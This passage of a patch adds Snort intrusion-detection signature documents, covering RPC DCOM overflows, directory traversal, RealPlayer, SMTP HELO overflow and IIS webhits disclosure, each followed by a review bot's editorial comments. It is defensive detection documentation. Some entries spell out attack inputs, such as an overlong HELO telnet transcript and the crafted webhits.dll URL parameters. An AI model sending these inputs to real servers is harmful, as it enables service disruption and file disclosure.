+Affected Systems:
+
+--
+Attack Scenarios:
+An attacker can access the authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Disallow administrative access from sources external to the protected
+network.
+
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
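Review bot: Affected Systems is left empty; given the generic Summary, at least "All systems using a web server." (as 1157.txt in this patch puts it) belongs there. Typo in Detailed Information: "running ona web server" should be "running on a web server". Additional References is also empty, and "Exploits exist." under Ease of Attack is unsupported without at least one reference.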
--- /dev/null
+++ b/doc/signatures/1157.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1157
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
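Review bot: "code of the attackers choosing" in Impact needs the possessive, "attacker's choosing" (the same phrase recurs in 1235.txt, 1745.txt and 100000646.txt in this patch). Several lines end with trailing whitespace ("known ", "of ", "the ", "and "). Additional References is empty even though Ease of Attack asserts "Exploits exist."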
--- /dev/null
+++ b/doc/signatures/1657.txt
@@ -0,0 +1,64 @@
+Rule:  
+
+--
+Sid:
+1657
+
+--
+Summary:
+This event is generated when an attempt is made to execute a directory
+traversal attack.
+
+--
+Impact:
+Information disclosure. This is a directory traversal attempt which can
+lead to information disclosure and possible exposure of sensitive
+system information.
+
+--
+Detailed Information:
+Directory traversal attacks usually target web, web applications and ftp
+servers that do not correctly check the path to a file when requested by
+the client.
+
+This can lead to the disclosure of sensitive system information which may
+be used by an attacker to further compromise the system.
+
+--
+Affected Systems:
+
+--
+Attack Scenarios:
+An authorized user or anonymous user can use the directory traversal 
+technique, to browse folders outside the ftp root directory. Information
+gathered may be used in further attacks against the host.
+
+--
+Ease of Attack:
+Simple. No exploit software required.
+
+--
+False Positives:
+None known
+
+--
+False Negatives:
+None known
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches
+
+Upgrade the software to the latest non-affected version.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+
+--
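Review bot: Affected Systems is empty; Detailed Information lists web servers, web applications and FTP servers while Attack Scenarios talks only about browsing outside the ftp root, so the document should say which of these this rule targets. "Apply the appropriate vendor supplied patches" under Corrective Action is missing its period, "None known" lacks periods unlike the rest of the file, "Rule:  " and the final "-- " separator carry trailing whitespace, and there is a stray blank line before the closing "--".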
--- /dev/null
+++ b/doc/signatures/3205.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3205
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
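Review bot: this file is a word-for-word copy of 3338.txt in the same patch (and of 3258.txt and 3335.txt), so nothing tells the reader how SID 3205 differs from the other three RPC DCOM rules. Add at least one sentence in Summary or Detailed Information describing the specific traffic this rule covers. The same fixes apply as for the other copies: "Expoit" should be "Exploit", and Additional References should cite the Microsoft bulletin for a vulnerability the text describes as patched.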
--- /dev/null
+++ b/doc/signatures/2422.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+2422
+
+--
+Summary:
+This event is generated when an attempt is made to download a file that
+may be an attack vector for a known exploit to a vulnerability in Real 
+Networks RealPlayer/RealOne player.
+
+--
+Impact:
+Serious. Execution of arbitrary code.
+
+--
+Detailed Information:
+RealNetworks RealPlayer/RealOne player is a streaming media player for
+Microsoft Windows, Apple Macintosh and UNIX/Linux based operating systems.
+
+A buffer overrun condition is present in some versions of the player
+that may present a remote attacker with the opportunity to execute code
+of their choosing on a client using one of these players.
+
+--
+Affected Systems:
+	Real Networks RealOne Desktop Manager
+	Real Networks RealOne Enterprise Desktop 6.0.11 .774
+	Real Networks RealOne Player 1.0
+	Real Networks RealOne Player 2.0
+	Real Networks RealOne Player 6.0.11 .868
+	Real Networks RealOne Player version 2.0 for Windows
+	Real Networks RealPlayer 8.0 Win32
+	Real Networks RealPlayer 8.0 Unix
+	Real Networks RealPlayer 8.0 Mac
+	Real Networks RealPlayer 10.0 BETA
+
+--
+Attack Scenarios:
+An attacker may supply a malformed file to the client to exploit the
+issue.
+
+--
+Ease of Attack:
+Simple. 
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
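Review bot: the version strings under Affected Systems contain stray spaces ("6.0.11 .774" and "6.0.11 .868"); if these are build numbers they should read "6.0.11.774" and "6.0.11.868", so please verify against the vendor advisory. "Upgrade to the latest non-affected version of the software" is missing its period. Additional References is empty although the Summary speaks of a known exploit for a specific RealPlayer/RealOne vulnerability; cite the advisory or CVE. The Summary writes "Real Networks" while Detailed Information writes "RealNetworks"; pick one.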
--- /dev/null
+++ b/doc/signatures/100000136.txt
@@ -0,0 +1,55 @@
+Rule: 
+
+--
+Sid: 
+100000136
+
+-- 
+Summary:
+This event is generated when an attempt is made to exploit a vulnerability
+associated with the gnu_mailutils IMAP4 server.
+
+--
+Impact:
+Serious. Execution of arbitrary commands may be possible.
+
+--
+Detailed Information:
+
+A vulnerability exists in the way that the GNU Mailutils IMAP4 server handles 
+malformed IMAP commands containing format strings.  This may permit the 
+execution of arbitrary code on a vulnerable server.
+
+--
+Affected Systems:
+GNU Mailutils 0.5, 0.6
+
+--
+Attack Scenarios:
+An attacker can send an IMAP command containing format strings, possibly 
+permitting the execution of arbitrary code.
+
+-- 
+Ease of Attack: 
+Simple, exploit scripts exist.
+
+-- 
+False Positives:
+None known.
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Upgrade to version 0.6.90 or higher.
+
+--
+Contributors: 
+Judy Novak <judy.novak@sourcefire.com>
+
+-- 
+Additional References:
+
+--
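Review bot: Additional References is empty although the document names a specific product, affected versions (GNU Mailutils 0.5 and 0.6) and a fix version (0.6.90); cite the advisory or CVE so the version claims can be checked. The Summary writes "gnu_mailutils" where the other sections write "GNU Mailutils"; use the product name. Formatting: "Rule: ", "Sid: ", "Ease of Attack: ", "Corrective Action: ", "Contributors: " and several "-- " separators carry trailing spaces, there is a stray blank line after "Detailed Information:", and "None Known" under False Negatives should be "None known." as under False Positives.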
--- /dev/null
+++ b/doc/signatures/3258.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3258
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
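Review bot: this file duplicates 3338.txt, 3205.txt and 3335.txt in this patch verbatim, so the reader has no way to tell what SID 3258 detects that the others do not. Add a sentence to Summary or Detailed Information naming the specific request or transport this rule covers. As in the other copies, "Expoit" should be "Exploit" and Additional References should not be empty for a patched Microsoft vulnerability.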
--- /dev/null
+++ b/doc/signatures/730.txt
@@ -0,0 +1,62 @@
+Rule:
+
+--
+Sid:
+730
+
+--
+Summary:
+This event is generated when network traffic indicating the use of a
+multimedia application is detected.
+
+--
+Impact:
+This may be a violation of corporate policy since these applications can
+be used to bypass security measures designed to restrict the flow of
+corporate information to destinations external to the corporation.
+
+--
+Detailed Information:
+Multimedia client applications can be used to view movies and listen to
+music files. Some also include file sharing facilities. Use of these
+programs may constitute a violation of company policy.
+
+Clients may also contain vulnerabilities that can give an attacker an
+attack vector for delivering Trojan horse programs and viruses.
+
+--
+Affected Systems:
+	All systems running multimedia applications
+
+--
+Attack Scenarios:
+A user can download files from a source external to the protected
+network that may contain malicious code hidden in the file giving an
+attacker the opportunity to gain access to a host inside the protected
+network.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
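Review bot: Corrective Action is empty. The document itself says use of these applications may violate company policy and that the clients may carry vulnerabilities, so at minimum it should say to check the host and remove the application where policy forbids it, and keep permitted clients patched (551.txt in this patch has a one-line equivalent for p2p clients). Affected Systems, "All systems running multimedia applications", restates the Summary; naming the application family the rule detects would help.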
--- /dev/null
+++ b/doc/signatures/1745.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1745
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a PHP web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a PHP application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the PHP application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running PHP applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying PHP script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
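Review bot: the last line of the first Detailed Information paragraph ("relationships between the victim server and other hosts can be exploited by the attacker.") runs well past the wrap width used in the rest of the file and should be reflowed. Typos: "running ona web server" should be "running on a web server", and "attackers choosing" (twice) needs the possessive "attacker's". Additional References is empty.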
--- /dev/null
+++ b/doc/signatures/3335.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3335
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
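Review bot: fourth verbatim copy of the RPC DCOM document (see 3338.txt, 3205.txt and 3258.txt in this patch); without a distinguishing sentence in Summary or Detailed Information the four files are indistinguishable to the reader. Same corrections: "Expoit" to "Exploit", and cite the Microsoft bulletin under Additional References.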
--- /dev/null
+++ b/doc/signatures/978.txt
@@ -0,0 +1,63 @@
+Will %20 disappear with httpinspect?
+Rule:
+
+--
+Sid:
+978
+
+--
+Summary:
+This event is generated when an attempt is made to disclose the contents of a file on an Internet Information Service (IIS) host. 
+
+--
+Impact:
+Intelligence gathering activity.  This attack can display the contents of an Activer Server Page (ASP) file or other files located on the server. 
+
+--
+Detailed Information:
+A vulnerability exists in Windows NT 4.0 Option Pack and Windows 2000 Index Server.  The Index Server is a search engine used by IIS that allows a user's browser to search for text in HTML and other documents.   The Index Server has a Hit-Hightlighting component that highlights the text that satisifies the user's query.  A vulnerability exists in the webhits.dll file that allows disclosure of file contents when a URL is crafted to contain a hex-encoded space "%20" after the file name passed to webhits.dll and setting 'CiHiliteType' to 'Full' and 'CiRestriction' to 'none'
+
+--
+Affected Systems:
+Hosts running Microsoft Index Server 2.0
+
+--
+Attack Scenarios:
+An attacker can attempt to disclose the contents of a file by crafting a special URL to access the Hit-Highlighting component of the Index Server. 
+
+--
+Ease of Attack:
+Simple. 
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Apply the patch discussed in the referenced Microsoft Bulletin.
+ 
+--
+Contributors:
+Original rule writer unknown
+Modified by Brian Caswell <bmc@sourcefire.com>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Bugtraq
+http://www.securityfocus.com/bid/1084
+
+CVE
+http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2000-0302
+
+Microsoft
+http://www.microsoft.com/technet/security/bulletin/ms00-006.asp
+
+--
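Review bot: the first line of the file, "Will %20 disappear with httpinspect?", is an author's working note committed ahead of "Rule:" and should be removed; if the answer matters for detection (whether the preprocessor normalises the encoded space before the rule sees it), record it under False Negatives instead. Typos in Impact and Detailed Information: "Activer Server Page" should be "Active Server Page", "Hit-Hightlighting" should be "Hit-Highlighting", "satisifies" should be "satisfies", and the Detailed Information paragraph ends without a period. Corrective Action's reference to "the referenced Microsoft Bulletin" is backed by the MS00-006 link under Additional References, which is good.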
--- /dev/null
+++ b/doc/signatures/1549.txt
@@ -0,0 +1,63 @@
+Rule:
+
+--
+Sid:
+
+1549
+
+--
+Summary:
+This event is generated when an attempt is made to overflow a buffer in an SMTP server via a long SMTP HELO command. 
+
+--
+Impact:
+A remote attacker could exploit this vulnerability to cause a denial of service, or possibly execute arbitrary code.
+
+--
+Detailed Information:
+Most SMTP servers do not properly validate the input string. A buffer overflow may occur when an attacker use a HELO command followed by 1024+ characters. If the server is vulnerable ,it will crash or close the connection, otherwise it will give an error message.
+
+--
+Affected Systems:
+
+	SMTP servers Any version
+	AppleShare IP Mail Server Any version
+	Mercury Mail Server Any version
+	SLMail v2.6 and earlier
+	
+
+--
+Attack Scenarios:
+telnet victim.foo.com 25
+helo victim
+220 victim SMTP Server Ready 
+HELO XXXXXXXXXXX[a thousand of these]XXXXXXXX 
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software
+
+--
+Contributors:
+
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Snort documentation contributed by Nawapong Nakjang (tony@ksc.net, tonie@thai.com)
+
+--
+Additional References:
+
+--
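Review bot: the Attack Scenarios transcript is out of order: after "telnet victim.foo.com 25" the server sends the "220 victim SMTP Server Ready" banner first and only then does the client send HELO, yet the transcript shows "helo victim" before the banner and then a second HELO. Drop the stray "helo victim" line or move it below the 220 line. In Detailed Information, "Most SMTP servers do not properly validate the input string" overstates the case; the next sentence itself says a non-vulnerable server simply returns an error, so "Some SMTP servers" is accurate. Also "when an attacker use a HELO command" should be "uses", "vulnerable ,it" has a misplaced comma, there is a stray blank line between "Sid:" and "1549", a whitespace-only line after "SLMail v2.6 and earlier", and "SMTP servers Any version" under Affected Systems says nothing and should be removed or replaced by the actual vendors.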
--- /dev/null
+++ b/doc/signatures/1235.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1235
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
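Review bot: this file duplicates 1157.txt in the same patch word for word, so a reader cannot tell how SID 1235 and SID 1157 differ; at least the Summary or Detailed Information should name the specific web resource or pattern this rule covers. "attackers choosing" needs the possessive "attacker's", several lines end with trailing whitespace, and Additional References is empty.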
--- /dev/null
+++ b/doc/signatures/551.txt
@@ -0,0 +1,57 @@
+Rule:
+
+--
+Sid:
+551
+
+--
+Summary:
+This event is generated when activity by Peer-to-Peer (p2p) clients is detected.
+
+--
+Impact:
+Informational event. Unauthorized use of a p2p client may be in progress.
+
+--
+Detailed Information:
+This event indicates that use of a p2p client has been detected. This may be against corporate policy. p2p clients connect to other p2p clients to share files, commonly music and video files but can be configured to share any file on the local machine.
+
+This activity may not only use bandwidth but may also be used to transfer company confidential information to unauthorized hosts external to the protected network bypassing other security measures in place.
+
+--
+Affected Systems:
+Any host using a p2p client.
+
+--
+Attack Scenarios:
+This is indicative of the use of a p2p client.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Check the host and uninstall any p2p client found.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+OpenNap Specification
+http://opennap.sourceforge.net/napster.txt
+
+
+--
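Review bot: "Ease of Attack: Simple." does not fit an informational policy event; 3447.txt in this patch uses "NA" for sections that do not apply, and the same convention suits here and in Attack Scenarios, which only restates the Summary. There is an extra blank line before the closing "--" after the OpenNap reference.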
--- /dev/null
+++ b/doc/signatures/2083.txt
@@ -0,0 +1,75 @@
+Rule:
+
+--
+Sid:
+2083
+
+--
+Summary:
+xfsmd
+
+--
+Impact:
+Possible root access and code execution.
+
+--
+Detailed Information:
+It is possible for an attacker to exploit some versions of the xfsmd 
+daemon.
+
+Due to a programming error, the service does not correctly check for 
+certain meta-characters and they are not stripped from the request.
+
+The xfsmd daemon is not installed by default on IRIX systems but it is 
+part of an optional package.
+
+--
+Affected Systems:
+	IRIX 6.2
+	IRIX 6.3
+	IRIX 6.4
+	IRIX 6.5.x
+
+--
+Attack Scenarios:
+Exploits are widely available.
+
+--
+Ease of Attack:
+Simple
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Patches are NOT available for this issue.
+
+Disable and remove the xfsmd daemon.
+
+Uprade to the latest non affected version of the operating system
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Bugtraq:
+http://www.securityfocus.com/bid/5075
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-0359
+
+SGI IRIX:
+ftp://patches.sgi.com/support/free/security/advisories/20020606-01-I
+
+--
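Review bot: the Summary is just "xfsmd", not a sentence; it should say what the rule detects, i.e. an attempt to exploit the meta-character filtering flaw in the IRIX xfsmd daemon described under Detailed Information. Attack Scenarios ("Exploits are widely available.") describes ease of attack rather than a scenario; move that sentence to Ease of Attack and describe a request carrying unfiltered meta-characters here. Corrective Action: "Uprade" should be "Upgrade", "non affected" should be hyphenated as elsewhere in the patch, and the line lacks a period. Also "Patches are NOT available for this issue" sits beside an SGI advisory link; if the advisory offers a fix or workaround, reconcile the two.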
--- /dev/null
+++ b/doc/signatures/100000646.txt
@@ -0,0 +1,73 @@
+Rule:
+
+--
+Sid:
+100000646
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file 
+include vulnerability in the "Indexu" application running on a webserver. 
+Access to the file "user_edit.php" using a remote file being passed as the 
+"admin_template_path" parameter may indicate that an exploitation attempt has 
+been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a 
+remote machine via the "admin_template_path" parameter in the "user_edit.php" 
+script used by the "Indexu" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to execute system binaries or malicious code of the 
+attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Indexu
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own 
+credentials to gain access. Alternatively the attacker can exploit weaknesses 
+to gain access as the administrator by supplying input of their choosing to the 
+underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
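Review bot: the "--" separators after "100000646", after "All systems running CGI applications using Indexu" and after the Nigel Houghton contributor line are missing the blank line that precedes "--" everywhere else in the file, and there is a trailing blank line after the final "--". The Summary's "an exploitation attempt has been attempted" is redundant; "an exploitation attempt has been made" reads better. In Detailed Information the third paragraph ("This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server...") is a template paragraph about credential checks that does not describe a remote file include and contains the typo "ona"; drop it or move it below the specific paragraphs. "attackers choosing" (twice) needs the possessive. Additional References is empty although a named application, script and parameter are given; cite the advisory.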
--- /dev/null
+++ b/doc/signatures/1276.txt
@@ -0,0 +1,74 @@
+Rule:
+
+--
+Sid:
+1276
+
+--
+Summary:
+This event is generated when an attempt is made through a portmap
+GETPORT request to discover the port where the Remote Procedure Call
+(RPC) ypserv is listening.
+
+
+--
+Impact:
+Information disclosure. This request is used to discover which port
+ypserv is using. Attackers can also learn what versions of the ypserv
+protocol are accepted by ypserv. 
+
+--
+Detailed Information:
+The portmapper service registers all RPC services on UNIX hosts. It can
+be queried to determine the port where RPC services such as ypserv run.
+The ypserv RPC service looks up information in the local Network
+Information Service (NIS) maps. The ypserv program provides the server
+function for Yellow Pages (YP) by providing clients information from NIS
+maps. Multiple vulnerabilities are associated with the ypserv RPC program.
+
+--
+Affected Systems:
+	All hosts running the UNIX portmapper.
+
+--
+Attack Scenarios:
+An attacker can query the portmapper to discover the port where ypserv
+runs. This may be a precursor to accessing ypserv.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+If a legitimate remote user is allowed to access ypserv, this rule may trigger.
+
+--
+False Negatives:
+This rule detects probes of the portmapper service for ypserv, not
+probes of the ypserv service itself. Because RPC services often listen
+on fairly arbitrary ports, it may not be possible to detect misuses of
+the ypserv service itself. An attacker may attempt to go directly to the
+ypserv port without querying the portmapper service, which would not
+trigger the rule.
+
+--
+Corrective Action:
+Limit remote access to RPC services.
+
+Filter RPC ports at the firewall to ensure access is denied to
+RPC-enabled machines.
+
+Disable unneeded RPC services.
+
+--
+Contributors:
+Original rule written by Max Vision <vision@whitehats.com>
+Modified by Brian Caswell <bmc@sourcefire.com>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+--
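Review bot: Detailed Information ends with "Multiple vulnerabilities are associated with the ypserv RPC program" but Additional References is empty; at least one advisory or CVE for ypserv should be cited, otherwise the claim is unverifiable. The False Negatives paragraph, explaining that direct access to the ypserv port bypasses this portmapper rule, is a good model that most other documents in this patch lack. Minor: two blank lines after the Summary paragraph, and a trailing space after "accepted by ypserv."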
--- /dev/null
+++ b/doc/signatures/2572.txt
@@ -0,0 +1,78 @@
+Rule:
+
+--
+Sid:
+2572
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a potential 
+weakness on a host running a web application on Microsoft Internet 
+Information Server (IIS).
+
+--
+Impact:
+Information gathering possible administrator access.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to exploit potential 
+weaknesses in a host running a web application on Microsoft IIS.
+
+The attacker may be trying to gain information on the IIS implementation
+on the host, this may be the prelude to an attack against that host 
+using that information.
+
+The attacker may also be trying to gain administrator access to the 
+host, garner information on users of the system or retrieve sensitive 
+customer information.
+
+Some applications may store sensitive information such as database 
+connections, user information, passwords and customer information in 
+files accessible via a web interface. Care should be taken to ensure 
+these files are not accessible to external sources.
+
+--
+Affected Systems:
+Any host using IIS.
+
+--
+Attack Scenarios:
+An attacker can retrieve a sensitive file containing information on the IIS implementation. The attacker might then gain administrator access to the site, deface the content or gain access to a database.
+
+--
+Ease of Attack:
+Simple.
